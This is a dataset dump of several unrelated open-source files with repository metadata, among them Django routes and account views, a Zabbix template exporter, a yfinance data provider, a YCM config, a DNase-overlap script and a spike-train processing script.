| 2019-04-11T23:59:58
| 22,494,944
| 12
| 3
|
MIT
| 2019-04-11T23:46:54
| 2014-08-01T04:14:23
|
Python
|
UTF-8
|
Python
| false
| false
| 369
|
py
|
# URL routes for the phone-confirmation app.
# NOTE: uses the pre-Django-1.10 patterns()/string-view style; the first
# argument is a prefix that resolves each view in phoneconfirmation.views.
from django.conf.urls import url, patterns

urlpatterns = patterns(
    "phoneconfirmation.views",
    url(r"^$", "phone_list", name="phone_list"),
    url(r"^confirm_phone/(\w+)/$", "confirm_phone", name="phone_confirm"),
    url(r"^action/$", "action", name="phone_action"),
    url(r"^get-country-for-code/$", "get_country_for_code", name="get_country_for_code")
)
|
[
"paltman@gmail.com"
] |
paltman@gmail.com
|
363ece98f426ed769e0ca2315c020c8c4b8a79e2
|
8a18444ba20243cc0d1318efc2c06fbe3c8fbdba
|
/All_Template_Export/All_Templates_Export.py
|
1a54ddb853f88909850fda054c7c5fd77f2f731f
|
[] |
no_license
|
Aqumik/Zabbix-API
|
9157676b03b62e79a22f6c5161a9063137a0fac2
|
6670d58a871a7dc3f3f9dbfe443eff74cce14af9
|
refs/heads/main
| 2023-02-28T21:45:16.430836
| 2021-01-29T08:20:16
| 2021-01-29T08:20:16
| 334,079,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,445
|
py
|
# -*- coding:UTF-8 -*-
# @aqumik 2021-1-29 Python3 导出Zabbix所有模板,虽然xml格式有点难看,但是直接导入到服务器就可使用!!
# 具体参数可以查看注释,SSL直接使用了False
import json
import requests
class Zabbix(object):
    """Minimal Zabbix JSON-RPC client used to export all templates as XML."""

    def __init__(self,url,header,user,password):
        self.url = url
        self.header = header
        self.id = 0  # JSON-RPC request id
        self.user = user
        self.password = password

    # def get_auth(self):
    #     req = json.dumps(
    #         {
    #             "jsonrpc": "2.0",
    #             "method": "user.login",
    #             "params": {
    #                 "user": "Admin",
    #                 "password": "zabbix"
    #             },
    #             "id": 0
    #         }
    #     )
    #     ret = requests.post(url=self.url, data=req, headers=self.header).json()
    #     ret = ret['result']
    #     authid = ret
    #     print(authid)

    # Builds the JSON-RPC request payload; every request goes through here.
    def json_obj(self,method,auth=True,params={}):
        obj = {
            "jsonrpc": "2.0",
            "method": method,
            "params": params,
            'auth':auth,
            "id":self.id
        }
        # 'auth' must be removed before serialising for unauthenticated
        # calls (e.g. user.login), otherwise the API rejects the request.
        if not auth:
            del obj["auth"]
        obj = json.dumps(obj)
        return obj

    # Login: returns the API auth token.
    def user_login(self):
        data = self.json_obj(method="user.login",auth=False,params={"user":self.user,"password":self.password})
        req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
        req = req.json()['result']
        return req

    # Logout: invalidates the given auth token.
    def user_logout(self,auth):
        # auth = self.user_login()
        print('********退出模块,认证id',auth)
        data = self.json_obj(method="user.logout",auth=auth,params={})
        req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
        if req.json()['result'] == True:
            print('退出成功')
        else:
            print('退出失败')
        return req.text

    # Fetch the name and id of every template.
    def all_template_get(self,auth=True):
        print('all_template_get获取到认证id',auth)
        data = self.json_obj(method="template.get",auth=auth,
                             params={
                                 "output": [
                                     "host",
                                     "templateid"
                                 ]
                             })
        req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
        print(req.json()['result'])
        # self.user_logout(auth=auth)
        # Returns a list of {host, templateid} dicts.
        return req.json()['result']

    # Export every template into its own XML file.
    def all_template_xml(self,auth):
        # auth = self.user_login()
        all_template_get = self.all_template_get(auth=auth)
        for tempalte in all_template_get:
            template_name = tempalte['host']
            template_id = str(tempalte['templateid'])
            print('*********模板名字:%s, id:%s' % (template_name, template_id))
            data = self.json_obj(method="configuration.export",auth=auth,
                                 params={
                                     "options":{
                                         "templates": [
                                             template_id
                                         ]
                                     },
                                     "format": "xml"
                                 })
            req = requests.post(url=self.url,headers=self.header,data=data,verify=False).json()
            req = req['result']
            # Write the returned XML to a file named after the template.
            myxml = open(template_name+'.xml',mode='a',encoding='utf-8')
            print(req,file=myxml)
            myxml.close()
            print(req)
        print('****************all_template_xml获取到的auth',auth)
if __name__ == '__main__':
    url = 'http://192.168.20.180/zabbix/api_jsonrpc.php'
    header = {'Content-Type': 'application/json'}
    user = 'Admin'
    password = 'zabbix'
    # Log in once, reuse the auth token for the export, then log out.
    authid = Zabbix(url,header,user,password).user_login()
    print(authid)
    Zabbix(url, header,user,password).all_template_xml(authid)
    Zabbix(url, header,user,password).user_logout(authid)
|
[
"noreply@github.com"
] |
noreply@github.com
|
4b7ffa1ba61b1b2c13a7c33cbe25688ed235e748
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.BAX/Mono_16/pdf_to_json_test_Latn.BAX_Mono_16.py
|
419f2ec7b49e7c247dfa03dc2764cd5ebdafafec
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
# Regression driver: convert one PDF to JSON and dump the result to stdout.
import pdf_to_json as p2j
import json

url = "file:data/multilingual/Latn.BAX/Mono_16/udhr_Latn.BAX_Mono_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
# Store only image hashes instead of embedding the image bytes.
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
2516a2bd1fa7c23e64c179adee06fce8c112efc9
|
59b55a64d9340ef6ee7544c47b4c0086bf797236
|
/scripts/run_full_image.py
|
360a7b0b18a6b2d73edb97934fac0b73b9300056
|
[] |
no_license
|
Jeronics/fashion-mnist-test-case
|
eda3c70d7b5e5113203d39ec5506acd79356148c
|
0b15855e7222e17345d20ca946b0d86c2d1ae29d
|
refs/heads/master
| 2022-10-06T06:34:11.643639
| 2020-06-03T08:23:58
| 2020-06-03T08:23:58
| 268,487,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
############################# IMPORTS #############################
import os.path as path
import pickle
import numpy as np
import torch
import torchvision.transforms as transforms
from models.networks import ProductionCNN2
from utils.application_utils import get_label_and_bounding_box, create_image
from utils.config import MEAN_PIXEL, STD_PIXEL, ARTIFACTS_DIR
###################################################################
if __name__ == "__main__":
    np.random.seed(1)
    image_name = "test_long_image"
    pil_image = create_image(image_name)
    # Apply the same normalisation used at training time.
    default_transformation = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((MEAN_PIXEL,), (STD_PIXEL,))
    ])
    pil_image = default_transformation(pil_image)
    pil_image = pil_image.unsqueeze(0)  # add a batch dimension
    model_name = 'cnn_3'
    # loading the pickled grid-search artifact for this model
    with open(path.join(ARTIFACTS_DIR, model_name + '.pkl'), 'rb') as f:
        cvGridSearch = pickle.load(f)
    # Rebuild the production model from the best grid-search weights;
    # eval() disables dropout/batchnorm updates for inference.
    model = ProductionCNN2(state_dict=cvGridSearch.best_model.module_.state_dict()).eval()
    print(type(pil_image))
    with torch.no_grad():
        class_idx, image_with_contour = get_label_and_bounding_box(model, pil_image)
|
[
"jeronicarandell@gmail.com"
] |
jeronicarandell@gmail.com
|
0f0b988db044a90843787fcfa17790f226c36531
|
ce1f8877fa9ff084b75bceec4cc7ddf5b3153b07
|
/clif/testing/python/imported_methods_test.py
|
be75ee040777a7e9a8efe35837f737faf0fc1cda
|
[
"Apache-2.0"
] |
permissive
|
HenriChataing/clif
|
034aba392294ac30e40801815cf4d3172d3d44bd
|
307ac5b7957424706c598876d883936c245e2078
|
refs/heads/master
| 2021-01-23T16:25:19.543400
| 2017-09-01T22:18:03
| 2017-09-01T22:18:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clif.testing.python.imported_methods."""
import unittest
from clif.testing.python import imported_methods
class InheritedConstructorsTest(unittest.TestCase):
    """Checks that CLIF exposes constructors/methods imported from a base class."""

    def testInheritedConstructor(self):
        # Derived accepts the base-class constructor argument...
        d = imported_methods.Derived(12345)
        self.assertEqual(d.GetA(), 12345)
        # ...and base-class methods remain callable on the derived wrapper.
        self.assertEqual(d.GetAWithOffset(43210), 55555)
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
|
[
"mrovner@google.com"
] |
mrovner@google.com
|
2180fbd40a9cda6cf6e7180218f7f525f2c351ce
|
664269ec1346b69b1af11d041d5352921ebef060
|
/sample-apps/rds/sample-app/src/pymysql/_compat.py
|
252789ec4460a3ee383f18f8af26e42ba82b666d
|
[
"Apache-2.0"
] |
permissive
|
awslabs/aws-servicebroker
|
0f288d4da0201a85e99f27bf7d95cc84d30d2f93
|
b28f42ad1e5861fd3009a10ad4bd511a384d3943
|
refs/heads/main
| 2023-08-30T01:09:05.351854
| 2023-07-06T18:09:22
| 2023-07-06T18:09:22
| 125,404,208
| 468
| 165
|
Apache-2.0
| 2023-08-30T14:07:12
| 2018-03-15T17:36:28
|
Python
|
UTF-8
|
Python
| false
| false
| 481
|
py
|
"""Python 2/3 compatibility shims: normalised type/builtin aliases."""
import sys

# Interpreter version / implementation detection flags.
PY2 = sys.version_info[0] == 2
PYPY = hasattr(sys, 'pypy_translation_info')
JYTHON = sys.platform.startswith('java')
IRONPYTHON = sys.platform == 'cli'
CPYTHON = not (PYPY or JYTHON or IRONPYTHON)

if not PY2:
    # On Python 3 the 2.x-only names collapse onto the builtins.
    range_type = range
    text_type = str
    long_type = int
    str_type = str
    unichr = chr
else:
    import __builtin__
    range_type = xrange
    text_type = unicode
    long_type = long
    str_type = basestring
    unichr = __builtin__.unichr
|
[
"jmmccon@amazon.com"
] |
jmmccon@amazon.com
|
c292ededc8a2ccc3333ba607b656b58dd2f5efe0
|
3def38a9c4e148fbec899d8e6115cdefb61ceead
|
/.ycm_extra_conf.py
|
6cbf0f0a59f53d4b04046f1885363df2db3fdae4
|
[] |
no_license
|
shinew/configs
|
a2a7e8eca6dc25c5f5d097d6e4d11d43f3c2adff
|
d910c8935c0d302dd80e116c1740b32e22e1b7ce
|
refs/heads/master
| 2021-03-27T15:50:50.334607
| 2018-03-31T00:19:30
| 2018-03-31T00:19:30
| 55,921,635
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
    '-Wall',
    '-Wextra',
    '-Werror',
    #'-Wc++98-compat',
    '-Wno-long-long',
    '-Wno-variadic-macros',
    '-fexceptions',
    '-DNDEBUG',
    # THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
    # language to use when compiling headers. So it will guess. Badly. So C++
    # headers will be compiled as C headers. You don't want that so ALWAYS specify
    # a "-std=<something>".
    # For a C project, you would set this to something like 'c99' instead of
    # 'c++11'.
    '-std=c++14',
    # ...and the same thing goes for the magic -x option which specifies the
    # language that the files to be compiled are written in. This is mostly
    # relevant for c++ headers.
    # For a C project, you would set this to 'c' instead of 'c++'.
    '-x',
    'c++',
    # Here are the system includes, found by: 'echo | clang -v -E -x c++ -'
    '-isystem',
    '/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1',
    '-isystem',
    '/usr/local/include',
    '-isystem',
    '/Library/Developer/CommandLineTools/usr/lib/clang/9.1.0/include',
    '-isystem',
    '/Library/Developer/CommandLineTools/usr/include',
    '-isystem',
    '/usr/include',
    #'-isystem',
    #'/usr/local/lib',
    # '-isystem',
    # os.path.join(os.environ['GTEST_DIR'], 'include'),
]

# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''

# An empty folder path means "no database"; fall back to the static flags.
if os.path.exists( compilation_database_folder ):
    database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
    database = None

# Source extensions tried when mapping a header back to its source file.
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
    """Absolute path of the directory containing this config file."""
    here = os.path.abspath(__file__)
    return os.path.dirname(here)
def MakeRelativePathsInFlagsAbsolute(flags, working_directory):
    """Return a copy of *flags* with relative paths rooted at *working_directory*.

    Handles both the two-token form ('-I', 'path') and the fused form
    ('-Ipath') for the path-taking flags. With no working directory the
    flags are returned unchanged (as a new list).
    """
    if not working_directory:
        return list(flags)

    path_prefixes = ['-isystem', '-I', '-iquote', '--sysroot=']
    absolute = []
    expect_path = False
    for token in flags:
        rewritten = token
        if expect_path:
            # Previous token was a bare path flag: this token is its path.
            expect_path = False
            if not token.startswith('/'):
                rewritten = os.path.join(working_directory, token)
        for prefix in path_prefixes:
            if token == prefix:
                # Bare flag: the path arrives as the next token.
                expect_path = True
                break
            if token.startswith(prefix):
                # Fused form: '-Ifoo' -> '-I' + absolute path.
                rewritten = prefix + os.path.join(
                    working_directory, token[len(prefix):])
                break
        if rewritten:
            absolute.append(rewritten)
    return absolute
def IsHeaderFile(filename):
    """True if *filename* carries a C/C++ header extension."""
    _, ext = os.path.splitext(filename)
    return ext in ('.h', '.hxx', '.hpp', '.hh')
def GetCompilationInfoForFile( filename ):
    """Look up compile flags for *filename* in the compilation database."""
    # The compilation_commands.json file generated by CMake does not have entries
    # for header files. So we do our best by asking the db for flags for a
    # corresponding source file, if any. If one exists, the flags for that file
    # should be good enough.
    if IsHeaderFile( filename ):
        basename = os.path.splitext( filename )[ 0 ]
        for extension in SOURCE_EXTENSIONS:
            replacement_file = basename + extension
            if os.path.exists( replacement_file ):
                compilation_info = database.GetCompilationInfoForFile(
                    replacement_file )
                if compilation_info.compiler_flags_:
                    return compilation_info
        # No sibling source file found: no flags for this header.
        return None
    return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
  """YCM entry point: return the compiler flags to use for *filename*."""
  if not database:
    # No compilation database: fall back to the static 'flags' list
    # (defined earlier in this file), resolved relative to this script.
    return {
      'flags': MakeRelativePathsInFlagsAbsolute( flags, DirectoryOfThisScript() ),
      'do_cache': True
    }

  # compilation_info.compiler_flags_ is a "list-like" StringVec object,
  # not a real Python list.
  compilation_info = GetCompilationInfoForFile( filename )
  if not compilation_info:
    return None
  final_flags = MakeRelativePathsInFlagsAbsolute(
    compilation_info.compiler_flags_,
    compilation_info.compiler_working_dir_ )
  return {
    'flags': final_flags,
    'do_cache': True
  }
|
[
"shine.sw.wang@gmail.com"
] |
shine.sw.wang@gmail.com
|
236c4133d1ff95f11a4ce5df03a7b6a671f566ba
|
1ebf1d957e81555baade65fdb57041b914736f3b
|
/com/ddm/tradingbot/data/provider/yFinanceProvider.py
|
692210494e27557bbe045782244c9be7186fb79e
|
[] |
no_license
|
damenv/trabot
|
a777204d3459b86e01742db3d59f7ae2be43a283
|
08633722ba1a4a7fbbca162af9308f596196824f
|
refs/heads/master
| 2022-12-17T21:09:21.725391
| 2020-09-19T18:31:16
| 2020-09-19T18:31:16
| 290,363,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,069
|
py
|
"""
Using yfinance library to obtain the stock data
"""
import datetime as dt
import yfinance as yf
import pandas as pd
from com.ddm.tradingbot.data.provider.providerBase import providerBase
class yFinanceProvider(providerBase):
    """Stock-data provider backed by the yfinance library."""

    ticker = ""
    valor = "yyyiii"

    def __init__(self, ticker):
        self.ticker = ticker

    # NOTE(review): the original class defined getOHLCV twice; Python has no
    # method overloading, so only the (ticker_list, ...) variant was ever
    # callable. The shadowed single-ticker variant is preserved here under a
    # new name so it can actually be used.
    def getOHLCV_single(self, start_date, end_date) -> dict:
        """OHLCV data for this provider's configured ticker."""
        return yf.download(self.ticker, start_date, end_date)

    def getOHLCV(self, ticker_list, start_date, end_date) -> dict:
        """OHLCV data for each ticker in *ticker_list*, keyed by ticker.

        Bug fix: the original built the dict but never returned it, so
        callers always received None.
        """
        ohlcv_data = {}
        for ticker in ticker_list:
            ohlcv_data[ticker] = yf.download(ticker, start_date, end_date)
        return ohlcv_data

    def getClosePrice(self, start_date, end_date, interval) -> dict:
        """Adjusted close prices for the configured ticker.

        NOTE(review): *interval* is accepted but never forwarded to
        yfinance -- confirm whether it should be passed as interval=interval.
        """
        return yf.download(self.ticker, start_date, end_date)["Adj Close"]

    def getClosePrice_list(self, ticker_list: list, start_date, end_date) -> dict:
        """Adjusted close prices for several tickers, one column per ticker."""
        close_price = pd.DataFrame()
        for ticker in ticker_list:
            close_price[ticker] = yf.download(ticker, start_date, end_date)["Adj Close"]
        return close_price
|
[
"damen1105@gmail.com"
] |
damen1105@gmail.com
|
bf23ff1ffbc40cacf8ba103e621f8ad641cd675f
|
1996a67d2a281706e9c141797e1813fc1b3612a7
|
/python/DNaseOverlap.py
|
b09fff46d97b9d18962c390ab47500ba50aaaf75
|
[] |
no_license
|
pjshort/SingletonMetric
|
91076a9976cc45a4ddf5f0750b20b7c46b7f1f5a
|
dc9af500c928b9d5b94aa75bc4b609e3feffe956
|
refs/heads/master
| 2021-01-10T06:20:49.350579
| 2016-03-07T11:12:25
| 2016-03-07T11:12:25
| 49,203,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
import pysam
import argparse
import sys
import os
def get_options():
    """Parse command-line options for the DNase-overlap script."""
    parser = argparse.ArgumentParser(description="Get CADD scores for set of alleles.")
    parser.add_argument("--variants", default="/path/to/input/variants",
                        help="location of variants in chr\tpos\tref\talt (minimal vcf) format")
    parser.add_argument("--variants_out", default=sys.stdout,
                        help="path to send the list of variants with DNASE overlap binary values.")
    # NOTE(review): this default is a *list*, yet the main block open()s the
    # value as a file path -- confirm the intended fallback mechanism.
    parser.add_argument("--roadmap_epigenome_ids", default = ["E002", "E010", "E053", "E072", "E081", "E082", "E083"],
                        help = "list of roadmap epigenome project ideas in form E###.")
    return parser.parse_args()
def get_variants(variants_path):
    """Read a tab-separated variants file and return (chr, pos, ref, alt) lists.

    The first line is treated as a header and skipped; *pos* values are
    converted to int and *alt* values have trailing whitespace stripped.
    """
    chroms, positions, refs, alts = [], [], [], []
    with open(variants_path, "r") as handle:
        handle.readline()  # skip the header
        for record in handle:
            fields = record.split("\t")
            chroms.append(fields[0])
            positions.append(int(fields[1]))
            refs.append(fields[2])
            alts.append(fields[3].rstrip())
    return chroms, positions, refs, alts
def check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR):
    """Return a 0/1 list marking which variants fall inside a DNase peak.

    Queries the tabix-indexed enhancer BED file for roadmap epigenome *id*
    (e.g. E081 is male fetal brain). *pos* is 1-based, hence the
    (pos-1, pos) fetch window.
    """
    tabixfile = pysam.Tabixfile(TABIX_DIR + "regions_enh_%s.bed.gz" % id)
    overlap = []
    for chrom, position in zip(chr, pos):
        hits = tabixfile.fetch("chr" + chrom, position - 1, position)
        overlap.append(1 if len(list(hits)) > 0 else 0)
    return overlap
if __name__ == "__main__":
    args = get_options()
    # Parallel chr/pos/ref/alt lists parsed from the variants file.
    chr, pos, ref, alt = get_variants(args.variants)
    TABIX_DIR = "/lustre/scratch113/projects/ddd/users/ps14/REP/"
    # NOTE(review): when the default (a list) is used, open() raises
    # TypeError, which this NameError clause does not catch, and id_list
    # would then be undefined below -- confirm the intended fallback.
    try:
        id_list = [line.rstrip() for line in open(args.roadmap_epigenome_ids)]
    except NameError:
        pass # take default (brain and brain developmental tissues)
    overlap_list = []
    i = 0
    # NOTE(review): id_list.pop(i) mutates the list while iterating it,
    # which skips the element after each removed id -- verify this is OK.
    for id in id_list:
        if not os.path.isfile("/lustre/scratch113/projects/ddd/users/ps14/REP/regions_enh_%s.bed.gz" % id):
            print "No DNase Peaks for %s. Skipping and moving to the next tissue." % id
            id_list.pop(i)
            continue
        print "Intersecting parental alleles with %s DNase peaks." % id
        overlap = check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR)
        overlap_list.append(overlap)
        i += 1
    # Re-read the variants file so original lines can be echoed verbatim
    # with the per-tissue overlap columns appended.
    myvariants = open(args.variants, "r")
    variant_header = myvariants.readline().rstrip()
    variants = myvariants.readlines()
    #lines = [variants] + overlap_list
    myfile = open(args.variants_out, 'w')
    # write header
    header = variant_header + "\t" + "\t".join(id_list) + "\n"
    myfile.write(header)
    # write lines
    i = 0
    for overlaps in zip(*overlap_list): # the * unpacks the list of lists
        var = variants[i].rstrip()
        myfile.write(var + "\t" + "\t".join(str(o) for o in overlaps) + "\n")
        i += 1
    print 'Finished!'
|
[
"pjshort42@gmail.com"
] |
pjshort42@gmail.com
|
95abb0d40ff2d7df34f470a31b6ed10e507c4cec
|
330e77e53d580a73e883e705b6bc8caca3456194
|
/accounts/views.py
|
611d57e964b7819e514d81af3de9be2323a30ba3
|
[] |
no_license
|
Chandan-97/CyTin
|
d2995970eade13ec46c7874ecb5c2922328e5367
|
e8612124a52a307a44c6833ddefe02b06a50c919
|
refs/heads/master
| 2020-03-10T11:39:18.188372
| 2018-04-13T04:26:01
| 2018-04-13T04:26:01
| 129,360,932
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,451
|
py
|
from django.shortcuts import render, redirect, HttpResponse
from django.contrib.auth import *
from .form import LoginForm, RegisterForm, RequestnewForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
import sendgrid
import os
from sendgrid.helpers.mail import *
# Create your views here.
def login_view(request):
    """Render the login form and authenticate the user on a valid POST.

    Bug fix: authenticate() returns None for bad credentials; the original
    passed that None straight to login(), which raises. Failed
    authentication now simply re-renders the form.
    """
    form = LoginForm(request.POST or None)
    if form.is_valid():  # clean() from forms.py is called
        username = form.cleaned_data.get("username")
        password = form.cleaned_data.get("password")
        user = authenticate(username=username, password=password)
        if user is not None:
            login(request, user)
            return redirect("/")
    # Invalid form or failed authentication: show the login page again.
    return render(request, "login_form.html", {"form": form})
def logout_view(request):
    """Log the current user out and show the login page."""
    logout(request)
    print(request.user.is_authenticated())  # debug: should now be False
    return render(request, "login_form.html", {})
def requestnew_view(request):
    """Show the software-request form; anonymous users are sent to login.

    On a valid POST the Software/Version/Comment fields are copied onto the
    model instance before saving.
    """
    if request.user.is_authenticated() == False:
        return redirect("/login")

    form = RequestnewForm(request.POST or None)
    if form.is_valid():
        software = form.save(commit=False)
        software.software = form.cleaned_data.get("Software")
        version = form.cleaned_data.get("Version")
        if version:
            software.version = version
        comment = form.cleaned_data.get("Comment")
        if comment:
            software.comment = comment
        software.save()
    return render(request, "requestnew_form.html", {"form": form})
def register_view(request):
    """Register a new user: create an inactive account and email an
    activation token via SendGrid."""
    print(request.user.is_authenticated())  # debug output
    form = RegisterForm(request.POST or None)
    if form.is_valid():
        user = form.save(commit=False)
        password = form.cleaned_data.get("password")
        user.set_password(password)  # hash the password instead of storing it raw
        user.is_active = False  # account stays disabled until activation
        user.save()
        # NOTE(review): current_site is never used below -- presumably meant
        # for building the activation URL; confirm.
        current_site = get_current_site(request)
        sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
        from_email = Email("iamoneofmykind@gmail.com")
        to_email = Email(form.cleaned_data.get("email"))
        subject = "Activate your CyTin account"
        # NOTE(review): the email body contains only the raw token -- no uid
        # and no clickable link, so the activate() view cannot be reached from
        # this message alone; confirm the intended email contents.
        content = Content("text/plain", account_activation_token.make_token(user))
        mail = Mail(from_email, subject, to_email, content)
        response = sg.client.mail.send.post(request_body=mail.get())
        return HttpResponse('Please confirm your email address to complete the registration')
    else:
        # NOTE(review): rebuilding an empty form here discards validation
        # errors from a failed POST -- confirm whether errors should be shown.
        form = RegisterForm()
        return render(request, "login_form.html", {"form":form})
# new_user = authenticate(username=user.username, password=user.password)
# login(request, user)
# print(request.user.is_authenticated())
# return redirect("/")
# return render(request, "login_form.html", {"form" : form})
def activate(request, uidb64, token):
    """Activate an account from an emailed uid/token pair.

    Bug fix: `User` was never imported -- the star-import of
    django.contrib.auth does not export the model class, so every call
    raised NameError. The model is now resolved via get_user_model(),
    which the star-import does provide.
    """
    User = get_user_model()
    try:
        uid = force_text(urlsafe_base64_decode(uidb64))
        user = User.objects.get(pk=uid)
    except (TypeError, ValueError, OverflowError, User.DoesNotExist):
        user = None
    if user is not None and account_activation_token.check_token(user, token):
        user.is_active = True
        user.save()
        login(request, user)
        return HttpResponse('Thank you for your email confirmation. Now you can login your account.')
    else:
        return HttpResponse('Activation link is invalid!')
|
[
"cp564738@gmail.com"
] |
cp564738@gmail.com
|
81f8e0ee87794f469abaa56ecaa9a35b05cecdf7
|
33d9426e8450cc0c9a0e1f377383c066a2e9b7f0
|
/Proceso_De_Todos_los_Datos.py
|
25c788d53679b366f83c9b579c2297d6d3ddf05b
|
[] |
no_license
|
tomasgarcianeuro/Funtions_Neuro
|
33d5ffd08b6780357e692a70ebaad81c80de9c96
|
39ce501bf9a68ea96249a8f41c7d2f077a13898e
|
refs/heads/main
| 2023-01-19T20:53:03.778169
| 2020-10-26T14:47:56
| 2020-10-26T14:47:56
| 307,396,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,927
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pickle
from scipy.ndimage import gaussian_filter as gauss_fil
from os import listdir
# =============================================================================
# NO CORRER_ USADO COMO PLANTILLA PARA DEMOSTRACION A SUB DIR SEGUN CLAUSULA map(lambda arg: arg/2, [12, 12 ,12])
# SUB DIR SE REHUSA A CREER EN EL DEBUGGEAR ()
# =============================================================================
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Inicializaciones fundamentales """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""INICIALIZANDO VECTOR TEMPORAL"""
# NOTE(review): `Diccionario` is only assigned much further down this script
# (in the manual-mode section), so executing the file top-to-bottom raises
# NameError here -- these lines presumably belong after the dictionary load.
# One timestamp per tracked position sample, spaced 400 ticks apart.
Eje_Temporal=np.zeros(Diccionario["Posicion"].T.shape[1])
for i in range(Eje_Temporal.shape[0]):
    Eje_Temporal[i]=400*(i+1)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Funciones """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""Division de vector disparo en cluster"""
def Division_luz_oscuridad(clu,Tiempo_Luz_oscuridad):
    """Split one cluster's spike times into light and dark epochs.

    *clu* holds the spike times of a single cluster; *Tiempo_Luz_oscuridad*
    is the trial table whose rows carry a label (starting with "l" for
    light, anything else for dark) plus start/end times. Returns a dict
    {'Luz': {...}, 'Oscuridad': {...}} where each inner dict maps keys like
    "l2.0", "l2.1", ... to the spikes falling inside that interval.
    """
    inicio=0 # time at which the current light/dark interval starts
    final=0 # time at which the current light/dark interval ends
    cluster_aux={}
    cluster_aux['Luz']={}
    cluster_aux['Oscuridad']={}
    luz=0 # running counter to individualise the l1, l2, l3, ... entries
    oscuridad=0
    inicio=float(Tiempo_Luz_oscuridad[0][2]) # start of the first event
    for i in range(Tiempo_Luz_oscuridad.shape[0]):
        final=float(Tiempo_Luz_oscuridad[i][3]) # end of the current event
        if Tiempo_Luz_oscuridad[i][1][0]=="l": # "l" marks light, otherwise dark
            tipo_luz=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
            # Slice the spikes inside (inicio, final) for this light period.
            # NOTE(review): the argmax/argmin slicing assumes clu is sorted --
            # confirm upstream guarantees.
            cluster_aux["Luz"][tipo_luz.format(str(luz))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)]
            inicio=final;luz+=1
        else:
            tipo_oscuridad=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
            cluster_aux["Oscuridad"][tipo_oscuridad.format(str(oscuridad))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)]
            inicio=final;oscuridad+=1
    return cluster_aux
def Division_clu_(Cluster,tiempo):
    """Build a dict mapping each cluster name to its spike times.

    *Cluster* holds the number of clusters in its first element followed by
    one cluster id per spike; *tiempo* holds the matching spike times.
    Returns {"Cluster Numero 0": array, ..., "Cluster Numero n": array}.
    """
    num_clu = int(Cluster[0])
    ids = np.delete(Cluster, 0)  # drop the leading cluster-count entry
    CLUSTERS = {"Cluster Numero {}".format(n): np.array([]) for n in range(num_clu + 1)}
    # Route every spike time into the array of the cluster that fired it.
    for cluster_id, spike_time in zip(ids, tiempo):
        key = "Cluster Numero {}".format(int(cluster_id))
        CLUSTERS[key] = np.append(CLUSTERS[key], spike_time)
    return CLUSTERS
def Division_global(Cluster,tiempo,tiempo_l_o):
    """Split every cluster's spike times into light/dark epochs.

